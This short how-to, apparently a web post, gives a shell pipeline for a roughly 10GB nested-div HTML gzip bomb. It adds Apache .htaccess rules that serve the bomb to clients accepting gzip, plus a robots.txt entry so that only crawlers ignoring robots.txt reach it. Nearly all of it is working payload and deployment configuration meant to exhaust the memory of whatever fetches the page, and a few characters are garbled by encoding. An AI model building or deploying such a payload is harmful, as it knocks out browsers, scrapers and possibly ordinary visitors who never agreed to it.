HTML zip bomb
(
echo '<!doctype html><meta charset=utf-8><body><title>BOOM!</title>'
yes '<div></div>'
) \
| dd bs=1M count="10240" iflag=fullblock \
| gzip -n > bomb.html.gz
Creates a ~10GB html with billions of nested
’s
A fallback page that will be displayed if gzip compression is not enabled.
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Gzip Bomb Notice</title>
</head>
<body>
<p>This file is a gzip bomb. Do not decompress unless you know what you are doing.</p>
</body>
</html>
Put both bomb.html and bomb.html.gz to the root folder.
.htaccess settings:
# GZIP BOMB
<IfModule mod_rewrite.c>
RewriteEngine On
# ---- Gzip static ----
# If client accepts gzip and bomb.html.gz exists β serve it
RewriteCond %{REQUEST_URI} ^/bomb\.html$
RewriteCond %{HTTP:Accept-Encoding} gzip
RewriteCond %{DOCUMENT_ROOT}/bomb.html.gz -f
RewriteRule ^bomb\.html$ /bomb.html.gz [L]
</IfModule>
# Tell Apache what these files are
AddType text/html .html.gz
AddEncoding gzip .gz
AddEncoding br .br
# Prevent Apache from double-compressing
<IfModule mod_deflate.c>
SetEnvIfNoCase Request_URI \.gz$ no-gzip
</IfModule>
# Cache rules similar to gzip_proxied (optional)
<FilesMatch "(bomb\.html(\.gz)?)$">
Header append Vary Accept-Encoding
</FilesMatch>
Options -MultiViews
Add to robots.txt
User-agent: *
Disallow: /bomb.html